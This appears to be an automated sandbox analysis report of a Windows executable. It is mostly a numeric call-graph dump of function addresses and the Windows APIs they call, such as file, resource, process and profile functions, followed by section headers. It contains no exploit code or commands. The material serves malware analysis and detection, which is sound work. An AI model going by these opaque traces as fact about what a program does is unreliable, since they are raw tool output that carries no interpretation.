39176->38534 39177->38535 39178->38534 39179->38540 39185->39162 39240 40a6e6 WideCharToMultiByte 39186->39240 39188 409202 39241 444432 39188->39241 39191 40b273 27 API calls 39192 409236 39191->39192 39287 438552 39192->39287 39195 409383 39197 40b273 27 API calls 39195->39197 39199 409399 39197->39199 39198 409254 39200 40937b 39198->39200 39308 4253cf 17 API calls 39198->39308 39201 438552 133 API calls 39199->39201 39312 424f26 122 API calls 39200->39312 39220 4093a3 39201->39220 39204 409267 39309 4253cf 17 API calls 39204->39309 39205 4094ff 39316 443d90 39205->39316 39208 4251c4 136 API calls 39208->39220 39209 409273 39310 4253af 17 API calls 39209->39310 39210 409507 39218 40951d 39210->39218 39336 408f2f 77 API calls 39210->39336 39212 4093df 39315 424f26 122 API calls 39212->39315 39214 4253cf 17 API calls 39214->39220 39218->39163 39220->39205 39220->39208 39220->39212 39220->39214 39222 4093e4 39220->39222 39313 4253af 17 API calls 39222->39313 39228 4093ed 39314 4253af 17 API calls 39228->39314 39231 4093f9 39231->39212 39232 409409 memcmp 39231->39232 39232->39212 39233 409421 memcmp 39232->39233 39234 4094a4 memcmp 39233->39234 39235 409435 39233->39235 39234->39212 39237 4094b8 memcpy memcpy 39234->39237 39235->39212 39236 409442 memcpy memcpy memcpy 39235->39236 39236->39212 39237->39212 39238->39171 39239->39174 39240->39188 39337 4438b5 39241->39337 39243 44444c 39244 409215 39243->39244 39351 415a6d 39243->39351 39244->39191 39244->39218 39247 444486 39249 4444b9 memcpy 39247->39249 39286 4444a4 39247->39286 39248 44469e 39248->39244 39251 443d90 110 API calls 39248->39251 39355 415258 39249->39355 39251->39244 39252 444524 39253 444541 39252->39253 39254 44452a 39252->39254 39358 444316 39253->39358 39392 416935 39254->39392 39258 444316 18 API calls 39259 444563 39258->39259 39260 444316 18 API calls 39259->39260 39261 44456f 39260->39261 39262 444316 18 API calls 39261->39262 39263 44457f 39262->39263 39263->39286 39372 432d4e 39263->39372 39266 444316 18 API calls 39267 4445b0 39266->39267 39376 41eed2 39267->39376 39405 4442e6 11 API calls 39286->39405 39406 438460 39287->39406 39289 409240 39289->39195 39290 4251c4 39289->39290 39418 424f07 39290->39418 39292 4251e4 39293 4251f7 39292->39293 39294 4251e8 39292->39294 39426 4250f8 39293->39426 39425 4446ea 11 API calls 39294->39425 39296 4251f2 39296->39198 39298 425209 39301 425249 39298->39301 39304 4250f8 126 API calls 39298->39304 39305 425287 39298->39305 39434 4384e9 134 API calls 39298->39434 39435 424f74 123 API calls 39298->39435 39301->39305 39436 424ff0 13 API calls 39301->39436 39304->39298 39438 415c7d 16 API calls 39305->39438 39306 425266 39306->39305 39437 415be9 memcpy 39306->39437 39308->39204 39309->39209 39312->39195 39313->39228 39314->39231 39315->39205 39317 443da3 39316->39317 39318 443db6 39316->39318 39439 41707a 11 API calls 39317->39439 39318->39210 39320 443da8 39321 443dbc 39320->39321 39322 443dac 39320->39322 39441 4300e8 memset memset memcpy 39321->39441 39440 4446ea 11 API calls 39322->39440 39325 443dce 39327 443de0 39325->39327 39329 443e22 39325->39329 39328 443e5a 39329->39328 39442 41f0ac 102 API calls 39329->39442 39336->39218 39338 4438d0 39337->39338 39347 4438c9 39337->39347 39339 415378 memcpy memcpy 39338->39339 39340 4438d5 39339->39340 39341 4154e2 10 API calls 39340->39341 39342 443906 39340->39342 39340->39347 39341->39342 39343 443970 memset 39342->39343 39342->39347 39346 44398b 39343->39346 39344 4439a0 39345 415700 10 API calls 39344->39345 39344->39347 39349 4439c0 39345->39349 39346->39344 39348 41975c 10 API calls 39346->39348 39347->39243 39348->39344 39349->39347 39350 418981 10 API calls 39349->39350 39350->39347 39352 415a77 39351->39352 39353 415a8d 39352->39353 39354 415a7e memset 39352->39354 39353->39247 39354->39353 39356 4438b5 11 API calls 39355->39356 39357 41525d 39356->39357 39357->39252 39359 444328 39358->39359 39360 444423 39359->39360 39361 44434e 39359->39361 39363 4446ea 11 API calls 39360->39363 39362 432d4e memset memset memcpy 39361->39362 39364 44435a 39362->39364 39369 444381 39363->39369 39366 444375 39364->39366 39371 44438b 39364->39371 39365 432d4e memset memset memcpy 39367 4443ec 39365->39367 39368 416935 16 API calls 39366->39368 39367->39369 39370 416935 16 API calls 39367->39370 39368->39369 39369->39258 39370->39369 39371->39365 39373 432d65 39372->39373 39374 432d58 39372->39374 39373->39266 39375 432cc4 memset memset memcpy 39374->39375 39375->39373 39393 41693e 39392->39393 39397 41698e 39392->39397 39394 41694c 39393->39394 39395 422fd1 memset 39393->39395 39396 4165a0 11 API calls 39394->39396 39394->39397 39395->39394 39398 416972 39396->39398 39397->39286 39398->39397 39399 422b84 15 API calls 39398->39399 39399->39397 39405->39248 39407 41703f 11 API calls 39406->39407 39408 43847a 39407->39408 39409 43848a 39408->39409 39410 43847e 39408->39410 39412 438270 133 API calls 39409->39412 39411 4446ea 11 API calls 39410->39411 39414 438488 39411->39414 39413 4384aa 39412->39413 39413->39414 39415 424f26 122 API calls 39413->39415 39414->39289 39416 4384bb 39415->39416 39417 438270 133 API calls 39416->39417 39417->39414 39419 424f1f 39418->39419 39420 424f0c 39418->39420 39422 424eea 11 API calls 39419->39422 39421 416760 11 API calls 39420->39421 39423 424f18 39421->39423 39424 424f24 39422->39424 39423->39292 39424->39292 39425->39296 39427 425108 39426->39427 39433 42510d 39426->39433 39428 424f74 123 API calls 39427->39428 39428->39433 39429 42569b 124 API calls 39430 42516e 39429->39430 39432 415c7d 16 API calls 39430->39432 39431 425115 39431->39298 39432->39431 39433->39429 39433->39431 39434->39298 39435->39298 39436->39306 39437->39305 39438->39296 39439->39320 39440->39318 39441->39325 39442->39329 39472 413f4f 39445->39472 39448 413f37 K32GetModuleFileNameExW 39449 413f4a 39448->39449 39449->38567 39451 413969 wcscpy 39450->39451 39452 41396c wcschr 39450->39452 39464 413a3a 39451->39464 39452->39451 39454 41398e 39452->39454 39477 4097f7 wcslen wcslen _memicmp 39454->39477 39456 41399a 39457 4139a4 memset 39456->39457 39458 4139e6 39456->39458 39478 409dd5 GetWindowsDirectoryW wcscpy 39457->39478 39460 413a31 wcscpy 39458->39460 39461 4139ec memset 39458->39461 39460->39464 39479 409dd5 GetWindowsDirectoryW wcscpy 39461->39479 39462 4139c9 wcscpy wcscat 39462->39464 39464->38567 39465 413a11 memcpy wcscat 39465->39464 39467 413cb0 GetModuleHandleW 39466->39467 39468 413cda 39466->39468 39467->39468 39469 413cbf GetProcAddress 39467->39469 39470 413ce3 GetProcessTimes 39468->39470 39471 413cf6 39468->39471 39469->39468 39470->38569 39471->38569 39473 413f2f 39472->39473 39474 413f54 39472->39474 39473->39448 39473->39449 39475 40a804 8 API calls 39474->39475 39476 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39475->39476 39476->39473 39477->39456 39478->39462 39479->39465 39480->38589 39481->38613 39483 409cf9 GetVersionExW 39482->39483 39484 409d0a 39482->39484 39483->39484 39484->38619 39484->38622 39485->38626 39486->38628 39487->38695 39489 40bba5 39488->39489 39536 40cc26 39489->39536 39492 40bd4b 39557 40cc0c 39492->39557 39497 40b2cc 27 API calls 39498 40bbef 39497->39498 39564 40ccf0 _wcsicmp 39498->39564 39500 40bbf5 39500->39492 39565 40ccb4 6 API calls 39500->39565 39502 40bc26 39503 40cf04 17 API calls 39502->39503 39504 40bc2e 39503->39504 39505 40bd43 39504->39505 39506 40b2cc 27 API calls 39504->39506 39507 40cc0c 4 API calls 39505->39507 39508 40bc40 39506->39508 39507->39492 39566 40ccf0 _wcsicmp 39508->39566 39510 40bc46 39510->39505 39511 40bc61 memset memset WideCharToMultiByte 39510->39511 39567 40103c strlen 39511->39567 39513 40bcc0 39514 40b273 27 API calls 39513->39514 39515 40bcd0 memcmp 39514->39515 39515->39505 39516 40bce2 39515->39516 39517 404423 37 API calls 39516->39517 39518 40bd10 39517->39518 39518->39505 39519 40bd3a LocalFree 39518->39519 39520 40bd1f memcpy 39518->39520 39519->39505 39520->39519 39521->38709 39523 409a74 GetTempFileNameW 39522->39523 39524 409a66 GetWindowsDirectoryW 39522->39524 39523->38708 39524->39523 39525->38743 39526->38743 39527->38743 39528->38743 39529->38743 39530->38743 39531->38743 39532->38743 39533->38743 39534->38719 39535->38740 39568 4096c3 CreateFileW 39536->39568 39538 40cc34 39539 40cc3d GetFileSize 39538->39539 39547 40bbca 39538->39547 39540 40afcf 2 API calls 39539->39540 39541 40cc64 39540->39541 39569 40a2ef ReadFile 39541->39569 39543 40cc71 39570 40ab4a MultiByteToWideChar 39543->39570 39545 40cc95 CloseHandle 39546 40b04b ??3@YAXPAX 39545->39546 39546->39547 39547->39492 39548 40cf04 39547->39548 39549 40b633 free 39548->39549 39550 40cf14 39549->39550 39576 40b1ab free free 39550->39576 39552 40bbdd 39552->39492 39552->39497 39553 40cf1b 39553->39552 39555 40cfef 39553->39555 39577 40cd4b 39553->39577 39556 40cd4b 14 API calls 39555->39556 39556->39552 39558 40b633 free 39557->39558 39559 40cc15 39558->39559 39560 40aa04 free 39559->39560 39561 40cc1d 39560->39561 39623 40b1ab free free 39561->39623 39563 40b7d4 memset CreateFileW 39563->38701 39563->38702 39564->39500 39565->39502 39566->39510 39567->39513 39568->39538 39569->39543 39571 40ab93 39570->39571 39572 40ab6b 39570->39572 39571->39545 39573 40a9ce 4 API calls 39572->39573 39574 40ab74 39573->39574 39575 40ab7c MultiByteToWideChar 39574->39575 39575->39571 39576->39553 39578 40cd7b 39577->39578 39611 40aa29 6 API calls 39578->39611 39580 40cef5 39581 40aa04 free 39580->39581 39582 40cefd 39581->39582 39582->39553 39583 40cd89 39583->39580 39612 40aa29 6 API calls 39583->39612 39585 40ce1d 39613 40aa29 6 API calls 39585->39613 39587 40ce3e 39588 40ce6a 39587->39588 39614 40abb7 wcslen memmove 39587->39614 39589 40ce9f 39588->39589 39617 40abb7 wcslen memmove 39588->39617 39620 40a8d0 7 API calls 39589->39620 39593 40ce56 39615 40aa71 wcslen 39593->39615 39594 40ce8b 39618 40aa71 wcslen 39594->39618 39595 40ceb5 39621 40a8d0 7 API calls 39595->39621 39598 40ce5e 39616 40abb7 wcslen memmove 39598->39616 39599 40ce93 39619 40abb7 wcslen memmove 39599->39619 39603 40cecb 39622 40d00b malloc memcpy free free 39603->39622 39605 40cedd 39606 40aa04 free 39605->39606 39607 40cee5 39606->39607 39608 40aa04 free 39607->39608 39609 40ceed 39608->39609 39610 40aa04 free 39609->39610 39610->39580 39611->39583 39612->39585 39613->39587 39614->39593 39615->39598 39616->39588 39617->39594 39618->39599 39619->39589 39620->39595 39621->39603 39622->39605 39623->39563 39624->38759 39625->38767 37544 44dea5 37545 44deb5 FreeLibrary 37544->37545 37546 44dec3 37544->37546 37545->37546 39635 4148b6 FindResourceW 39636 4148cf SizeofResource 39635->39636 39639 4148f9 39635->39639 39637 4148e0 LoadResource 39636->39637 39636->39639 39638 4148ee LockResource 39637->39638 39637->39639 39638->39639 37720 415304 free 39640 441b3f 39650 43a9f6 39640->39650 39642 441b61 39823 4386af memset 39642->39823 39644 44189a 39645 442bd4 39644->39645 39646 4418e2 39644->39646 39647 4418ea 39645->39647 39825 441409 memset 39645->39825 39646->39647 39824 4414a9 12 API calls 39646->39824 39651 43aa20 39650->39651 39652 43aadf 39650->39652 39651->39652 39653 43aa34 memset 39651->39653 39652->39642 39654 43aa56 39653->39654 39655 43aa4d 39653->39655 39826 43a6e7 39654->39826 39834 42c02e memset 39655->39834 39660 43aad3 39836 4169a7 11 API calls 39660->39836 39661 43aaae 39661->39652 39661->39660 39676 43aae5 39661->39676 39662 43ac18 39665 43ac47 39662->39665 39838 42bbd5 memcpy memcpy memcpy memset memcpy 39662->39838 39666 43aca8 39665->39666 39839 438eed 16 API calls 39665->39839 39670 43acd5 39666->39670 39841 4233ae 11 API calls 39666->39841 39669 43ac87 39840 4233c5 16 API calls 39669->39840 39842 423426 11 API calls 39670->39842 39674 43ace1 39843 439811 162 API calls 39674->39843 39675 43a9f6 160 API calls 39675->39676 39676->39652 39676->39662 39676->39675 39837 439bbb 22 API calls 39676->39837 39678 43acfd 39683 43ad2c 39678->39683 39844 438eed 16 API calls 39678->39844 39680 43ad19 39845 4233c5 16 API calls 39680->39845 39682 43ad58 39846 44081d 162 API calls 39682->39846 39683->39682 39686 43add9 39683->39686 39850 423426 11 API calls 39686->39850 39687 43ae3a memset 39688 43ae73 39687->39688 39851 42e1c0 146 API calls 39688->39851 39689 43adab 39848 438c4e 162 API calls 39689->39848 39690 43ad6c 39690->39652 39690->39689 39847 42370b memset memcpy memset 39690->39847 39694 43adcc 39849 440f84 12 API calls 39694->39849 39695 43ae96 39852 42e1c0 146 API calls 39695->39852 39698 43aea8 39699 43aec1 39698->39699 39853 42e199 146 API calls 39698->39853 39700 43af00 39699->39700 39854 42e1c0 146 API calls 39699->39854 39700->39652 39704 43af1a 39700->39704 39705 43b3d9 39700->39705 39855 438eed 16 API calls 39704->39855 39710 43b3f6 39705->39710 39714 43b4c8 39705->39714 39706 43b60f 39706->39652 39914 4393a5 17 API calls 39706->39914 39709 43af2f 39856 4233c5 16 API calls 39709->39856 39896 432878 12 API calls 39710->39896 39712 43af51 39857 423426 11 API calls 39712->39857 39720 43b4f2 39714->39720 39902 42bbd5 memcpy memcpy memcpy memset memcpy 39714->39902 39716 43af7d 39858 423426 11 API calls 39716->39858 39903 43a76c 21 API calls 39720->39903 39721 43b529 39904 44081d 162 API calls 39721->39904 39722 43b462 39898 423330 11 API calls 39722->39898 39723 43af94 39859 423330 11 API calls 39723->39859 39727 43afca 39860 423330 11 API calls 39727->39860 39728 43b47e 39732 43b497 39728->39732 39899 42374a memcpy memset memcpy memcpy memcpy 39728->39899 39729 43b544 39733 43b55c 39729->39733 39905 42c02e memset 39729->39905 39730 43b428 39730->39722 39897 432b60 16 API calls 39730->39897 39900 4233ae 11 API calls 39732->39900 39906 43a87a 162 API calls 39733->39906 39735 43afdb 39861 4233ae 11 API calls 39735->39861 39740 43b56c 39744 43b58a 39740->39744 39907 423330 11 API calls 39740->39907 39741 43b4b1 39901 423399 11 API calls 39741->39901 39743 43afee 39862 44081d 162 API calls 39743->39862 39908 440f84 12 API calls 39744->39908 39745 43b4c1 39910 42db80 162 API calls 39745->39910 39750 43b592 39909 43a82f 16 API calls 39750->39909 39753 43b5b4 39911 438c4e 162 API calls 39753->39911 39755 43b5cf 39912 42c02e memset 39755->39912 39757 43b005 39757->39652 39761 43b01f 39757->39761 39863 42d836 162 API calls 39757->39863 39758 43b1ef 39873 4233c5 16 API calls 39758->39873 39761->39758 39871 423330 11 API calls 39761->39871 39872 42d71d 162 API calls 39761->39872 39762 43b212 39874 423330 11 API calls 39762->39874 39764 43b087 39864 4233ae 11 API calls 39764->39864 39765 43add4 39765->39706 39913 438f86 16 API calls 39765->39913 39768 43b22a 39875 42ccb5 11 API calls 39768->39875 39771 43b23f 39876 4233ae 11 API calls 39771->39876 39772 43b10f 39867 423330 11 API calls 39772->39867 39774 43b257 39877 4233ae 11 API calls 39774->39877 39778 43b129 39868 4233ae 11 API calls 39778->39868 39779 43b26e 39878 4233ae 11 API calls 39779->39878 39782 43b09a 39782->39772 39865 42cc15 19 API calls 39782->39865 39866 4233ae 11 API calls 39782->39866 39783 43b282 39879 43a87a 162 API calls 39783->39879 39785 43b13c 39869 440f84 12 API calls 39785->39869 39787 43b29d 39880 423330 11 API calls 39787->39880 39790 43b15f 39870 4233ae 11 API calls 39790->39870 39791 43b2af 39792 43b2b8 39791->39792 39793 43b2ce 39791->39793 39881 4233ae 11 API calls 39792->39881 39882 440f84 12 API calls 39793->39882 39797 43b2c9 39884 4233ae 11 API calls 39797->39884 39798 43b2da 39883 42370b memset memcpy memset 39798->39883 39801 43b2f9 39885 423330 11 API calls 39801->39885 39803 43b30b 39886 423330 11 API calls 39803->39886 39805 43b325 39887 423399 11 API calls 39805->39887 39807 43b332 39888 4233ae 11 API calls 39807->39888 39809 43b354 39889 423399 11 API calls 39809->39889 39811 43b364 39890 43a82f 16 API calls 39811->39890 39813 43b370 39891 42db80 162 API calls 39813->39891 39815 43b380 39892 438c4e 162 API calls 39815->39892 39817 43b39e 39893 423399 11 API calls 39817->39893 39819 43b3ae 39894 43a76c 21 API calls 39819->39894 39821 43b3c3 39895 423399 11 API calls 39821->39895 39823->39644 39824->39647 39825->39645 39827 43a6f5 39826->39827 39828 43a765 39826->39828 39827->39828 39915 42a115 39827->39915 39828->39652 39835 4397fd memset 39828->39835 39832 43a73d 39832->39828 39833 42a115 146 API calls 39832->39833 39833->39828 39834->39654 39835->39661 39836->39652 39837->39676 39838->39665 39839->39669 39840->39666 39841->39670 39842->39674 39843->39678 39844->39680 39845->39683 39846->39690 39847->39689 39848->39694 39849->39765 39850->39687 39851->39695 39852->39698 39853->39699 39854->39699 39855->39709 39856->39712 39857->39716 39858->39723 39859->39727 39860->39735 39861->39743 39862->39757 39863->39764 39864->39782 39865->39782 39866->39782 39867->39778 39868->39785 39869->39790 39870->39761 39871->39761 39872->39761 39873->39762 39874->39768 39875->39771 39876->39774 39877->39779 39878->39783 39879->39787 39880->39791 39881->39797 39882->39798 39883->39797 39884->39801 39885->39803 39886->39805 39887->39807 39888->39809 39889->39811 39890->39813 39891->39815 39892->39817 39893->39819 39894->39821 39895->39765 39896->39730 39897->39722 39898->39728 39899->39732 39900->39741 39901->39745 39902->39720 39903->39721 39904->39729 39905->39733 39906->39740 39907->39744 39908->39750 39909->39745 39910->39753 39911->39755 39912->39765 39913->39706 39914->39652 39916 42a175 39915->39916 39918 42a122 39915->39918 39916->39828 39921 42b13b 146 API calls 39916->39921 39918->39916 39919 42a115 146 API calls 39918->39919 39922 43a174 39918->39922 39946 42a0a8 146 API calls 39918->39946 39919->39918 39921->39832 39936 43a196 39922->39936 39937 43a19e 39922->39937 39923 43a306 39923->39936 39966 4388c4 14 API calls 39923->39966 39926 42a115 146 API calls 39926->39937 39928 43a642 39928->39936 39970 4169a7 11 API calls 39928->39970 39932 43a635 39969 42c02e memset 39932->39969 39936->39918 39937->39923 39937->39926 39937->39936 39947 42ff8c 39937->39947 39955 415a91 39937->39955 39959 4165ff 39937->39959 39962 439504 13 API calls 39937->39962 39963 4312d0 146 API calls 39937->39963 39964 42be4c memcpy memcpy memcpy memset memcpy 39937->39964 39965 43a121 11 API calls 39937->39965 39939 42bf4c 14 API calls 39941 43a325 39939->39941 39940 4169a7 11 API calls 39940->39941 39941->39928 39941->39932 39941->39936 39941->39939 39941->39940 39942 42b5b5 memset memcpy 39941->39942 39945 4165ff 11 API calls 39941->39945 39967 42b63e 14 API calls 39941->39967 39968 42bfcf memcpy 39941->39968 39942->39941 39945->39941 39946->39918 39971 43817e 39947->39971 39949 42ff9d 39949->39937 39950 42ff99 39950->39949 39951 42ffe3 39950->39951 39952 42ffd0 39950->39952 39976 4169a7 11 API calls 39951->39976 39975 4169a7 11 API calls 39952->39975 39956 415a9d 39955->39956 39957 415ab3 39956->39957 39958 415aa4 memset 39956->39958 39957->39937 39958->39957 40127 4165a0 39959->40127 39962->39937 39963->39937 39964->39937 39965->39937 39966->39941 39967->39941 39968->39941 39969->39928 39970->39936 39972 438187 39971->39972 39974 438192 39971->39974 39977 4380f6 39972->39977 39974->39950 39975->39949 39976->39949 39979 43811f 39977->39979 39978 438164 39978->39974 39979->39978 39982 437e5e 39979->39982 40005 4300e8 memset memset memcpy 39979->40005 40006 437d3c 39982->40006 39984 437eb3 39984->39979 39985 437ea9 39985->39984 39990 437f22 39985->39990 40021 41f432 39985->40021 39988 437f06 40068 415c56 11 API calls 39988->40068 39992 437f7f 39990->39992 39993 432d4e 3 API calls 39990->39993 39991 437f95 40069 415c56 11 API calls 39991->40069 39992->39991 39994 43802b 39992->39994 39993->39992 39997 4165ff 11 API calls 39994->39997 39996 437fa3 39996->39984 40072 41f638 103 API calls 39996->40072 39998 438054 39997->39998 40032 437371 39998->40032 40001 43806b 40002 438094 40001->40002 40070 42f50e 137 API calls 40001->40070 40002->39996 40071 4300e8 memset memset memcpy 40002->40071 40005->39979 40007 437d69 40006->40007 40010 437d80 40006->40010 40073 437ccb 11 API calls 40007->40073 40009 437d76 40009->39985 40010->40009 40011 437da3 40010->40011 40012 437d90 40010->40012 40014 438460 133 API calls 40011->40014 40012->40009 40077 437ccb 11 API calls 40012->40077 40017 437dcb 40014->40017 40015 437de8 40076 424f26 122 API calls 40015->40076 40017->40015 40074 444283 13 API calls 40017->40074 40019 437dfc 40075 437ccb 11 API calls 40019->40075 40022 41f44f 40021->40022 40023 41f54d 40021->40023 40024 41f466 40022->40024 40030 41f50b 40022->40030 40078 41f1a5 40022->40078 40103 41c06f memcmp 40022->40103 40104 41f3b1 89 API calls 40022->40104 40105 41f398 85 API calls 40022->40105 40023->40024 40107 41c635 memset memset 40023->40107 40024->39988 40024->39990 40030->40023 40030->40024 40106 41c295 85 API calls 40030->40106 40108 41703f 40032->40108 40034 437399 40035 43739d 40034->40035 40037 4373ac 40034->40037 40115 4446ea 11 API calls 40035->40115 40038 416935 16 API calls 40037->40038 40054 4373ca 40038->40054 40039 437584 40041 4375bc 40039->40041 40122 42453e 122 API calls 40039->40122 40040 438460 133 API calls 40040->40054 40123 415c7d 16 API calls 40041->40123 40044 4375d2 40048 4373a7 40044->40048 40124 4442e6 11 API calls 40044->40124 40045 4251c4 136 API calls 40045->40054 40047 4375e2 40047->40048 40125 444283 13 API calls 40047->40125 40048->40001 40050 415a91 memset 40050->40054 40053 43758f 40121 42453e 122 API calls 40053->40121 40054->40039 40054->40040 40054->40045 40054->40050 40054->40053 40067 437d3c 134 API calls 40054->40067 40116 425433 13 API calls 40054->40116 40117 425413 17 API calls 40054->40117 40118 42533e 16 API calls 40054->40118 40119 42538f 16 API calls 40054->40119 40120 42453e 122 API calls 40054->40120 40057 4375f4 40060 437620 40057->40060 40061 43760b 40057->40061 40059 43759f 40062 416935 16 API calls 40059->40062 40064 416935 16 API calls 40060->40064 40126 444283 13 API calls 40061->40126 40062->40039 40064->40048 40066 437612 memcpy 40066->40048 40067->40054 40068->39984 40069->39996 40070->40002 40071->39996 40072->39984 40073->40009 40074->40019 40075->40015 40076->40009 40077->40009 40079 41bc3b 100 API calls 40078->40079 40080 41f1b4 40079->40080 40081 41edad 85 API calls 40080->40081 40088 41f282 40080->40088 40082 41f1cb 40081->40082 40083 41f1f5 memcmp 40082->40083 40084 41f20e 40082->40084 40082->40088 40083->40084 40085 41f21b memcmp 40084->40085 40084->40088 40086 41f326 40085->40086 40089 41f23d 40085->40089 40087 41ee6b 85 API calls 40086->40087 40086->40088 40087->40088 40088->40022 40089->40086 40090 41f28e memcmp 40089->40090 40092 41c8df 55 API calls 40089->40092 40090->40086 40091 41f2a9 40090->40091 40091->40086 40094 41f308 40091->40094 40095 41f2d8 40091->40095 40093 41f269 40092->40093 40093->40086 40096 41f287 40093->40096 40097 41f27a 40093->40097 40094->40086 40101 4446ce 11 API calls 40094->40101 40098 41ee6b 85 API calls 40095->40098 40096->40090 40099 41ee6b 85 API calls 40097->40099 40100 41f2e0 40098->40100 40099->40088 40102 41b1ca memset 40100->40102 40101->40086 40102->40088 40103->40022 40104->40022 40105->40022 40106->40023 40107->40024 40109 417044 40108->40109 40110 41705c 40108->40110 40112 416760 11 API calls 40109->40112 40114 417055 40109->40114 40111 417075 40110->40111 40113 41707a 11 API calls 40110->40113 40111->40034 40112->40114 40113->40109 40114->40034 40115->40048 40116->40054 40117->40054 40118->40054 40119->40054 40120->40054 40121->40059 40122->40041 40123->40044 40124->40047 40125->40057 40126->40066 40132 415cfe 40127->40132 40137 415d23 __aullrem __aulldvrm 40132->40137 40139 41628e 40132->40139 40133 4163ca 40146 416422 11 API calls 40133->40146 40135 416172 memset 40135->40137 40136 416422 10 API calls 40136->40137 40137->40133 40137->40135 40137->40136 40138 415cb9 10 API calls 40137->40138 40137->40139 40138->40137 40140 416520 40139->40140 40141 416527 40140->40141 40145 416574 40140->40145 40143 416544 40141->40143 40141->40145 40147 4156aa 11 API calls 40141->40147 40144 416561 memcpy 40143->40144 40143->40145 40144->40145 40145->39937 40146->40139 40147->40143 40169 41493c EnumResourceNamesW 37548 4287c1 37549 4287d2 37548->37549 37550 429ac1 37548->37550 37551 428818 37549->37551 37552 42881f 37549->37552 37567 425711 37549->37567 37562 425ad6 37550->37562 37618 415c56 11 API calls 37550->37618 37585 42013a 37551->37585 37613 420244 96 API calls 37552->37613 37557 4260dd 37612 424251 119 API calls 37557->37612 37559 4259da 37611 416760 11 API calls 37559->37611 37563 429a4d 37568 429a66 37563->37568 37569 429a9b 37563->37569 37566 422aeb memset memcpy memcpy 37566->37567 37567->37550 37567->37559 37567->37563 37567->37566 37573 4260a1 37567->37573 37581 4259c2 37567->37581 37584 425a38 37567->37584 37601 4227f0 memset memcpy 37567->37601 37602 422b84 15 API calls 37567->37602 37603 422b5d memset memcpy memcpy 37567->37603 37604 422640 13 API calls 37567->37604 37606 4241fc 11 API calls 37567->37606 37607 42413a 89 API calls 37567->37607 37614 415c56 11 API calls 37568->37614 37572 429a96 37569->37572 37616 416760 11 API calls 37569->37616 37617 424251 119 API calls 37572->37617 37610 415c56 11 API calls 37573->37610 37575 429a7a 37615 416760 11 API calls 37575->37615 37581->37562 37605 415c56 11 API calls 37581->37605 37584->37581 37608 422640 13 API calls 37584->37608 37609 4226e0 12 API calls 37584->37609 37586 42014c 37585->37586 37589 420151 37585->37589 37628 41e466 96 API calls 37586->37628 37588 420162 37588->37567 37589->37588 37590 4201b3 37589->37590 37591 420229 37589->37591 37592 4201b8 37590->37592 37593 4201dc 37590->37593 37591->37588 37594 41fd5e 85 API calls 37591->37594 37619 41fbdb 37592->37619 37593->37588 37598 4201ff 37593->37598 37625 41fc4c 37593->37625 37594->37588 37598->37588 37600 42013a 96 API calls 37598->37600 37600->37588 37601->37567 37602->37567 37603->37567 37604->37567 37605->37559 37606->37567 37607->37567 37608->37584 37609->37584 37610->37559 37611->37557 37612->37562 37613->37567 37614->37575 37615->37572 37616->37572 37617->37550 37618->37559 37620 41fbf1 37619->37620 37621 41fbf8 37619->37621 37624 41fc39 37620->37624 37643 4446ce 11 API calls 37620->37643 37633 41ee26 37621->37633 37624->37588 37629 41fd5e 37624->37629 37626 41ee6b 85 API calls 37625->37626 37627 41fc5d 37626->37627 37627->37593 37628->37589 37632 41fd65 37629->37632 37630 41fdab 37630->37588 37631 41fbdb 85 API calls 37631->37632 37632->37630 37632->37631 37634 41ee41 37633->37634 37635 41ee32 37633->37635 37644 41edad 37634->37644 37647 4446ce 11 API calls 37635->37647 37639 41ee3c 37639->37620 37641 41ee58 37641->37639 37649 41ee6b 37641->37649 37643->37624 37653 41be52 37644->37653 37647->37639 37648 41eb85 11 API calls 37648->37641 37650 41ee70 37649->37650 37651 41ee78 37649->37651 37706 41bf99 85 API calls 37650->37706 37651->37639 37654 41be6f 37653->37654 37655 41be5f 37653->37655 37660 41be8c 37654->37660 37685 418c63 memset memset 37654->37685 37684 4446ce 11 API calls 37655->37684 37657 41be69 37657->37639 37657->37648 37660->37657 37661 41bf3a 37660->37661 37662 41bed1 37660->37662 37664 41bee7 37660->37664 37688 4446ce 11 API calls 37661->37688 37665 41bef0 37662->37665 37668 41bee2 37662->37668 37664->37657 37689 41a453 85 API calls 37664->37689 37665->37664 37667 41bf01 37665->37667 37666 41bf24 memset 37666->37657 37667->37666 37670 41bf14 37667->37670 37686 418a6d memset memcpy memset 37667->37686 37674 41ac13 37668->37674 37687 41a223 memset memcpy memset 37670->37687 37673 41bf20 37673->37666 37675 41ac52 37674->37675 37676 41ac3f memset 37674->37676 37678 41ac6a 37675->37678 37690 41dc14 19 API calls 37675->37690 37681 41acd9 37676->37681 37680 41aca1 37678->37680 37691 41519d 37678->37691 37680->37681 37682 41acc0 memset 37680->37682 37683 41accd memcpy 37680->37683 37681->37664 37682->37681 37683->37681 37684->37657 37685->37660 37686->37670 37687->37673 37688->37664 37690->37678 37694 4175ed 37691->37694 37702 417570 SetFilePointer 37694->37702 37697 41760a ReadFile 37698 417637 37697->37698 37699 417627 GetLastError 37697->37699 37700 4151b3 37698->37700 37701 41763e memset 37698->37701 37699->37700 37700->37680 37701->37700 37703 4175b2 37702->37703 37704 41759c GetLastError 37702->37704 37703->37697 37703->37700 37704->37703 37705 4175a8 GetLastError 37704->37705 37705->37703 37706->37651 37707 417bc5 37708 417c61 37707->37708 37709 417bda 37707->37709 37709->37708 37710 417bf6 UnmapViewOfFile CloseHandle 37709->37710 37712 417c2c 37709->37712 37714 4175b7 37709->37714 37710->37709 37710->37710 37712->37709 37719 41851e 18 API calls 37712->37719 37715 4175d6 CloseHandle 37714->37715 37716 4175c8 37715->37716 37717 4175df 37715->37717 37716->37717 37718 4175ce Sleep 37716->37718 37717->37709 37718->37715 37719->37712 39626 4147f3 39629 414561 39626->39629 39628 414813 39630 41456d 39629->39630 39631 41457f GetPrivateProfileIntW 39629->39631 39634 4143f1 memset _itow WritePrivateProfileStringW 39630->39634 39631->39628 39633 41457a 39633->39628 39634->39633

                                                                                                                                                Executed Functions

                                                                                                                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
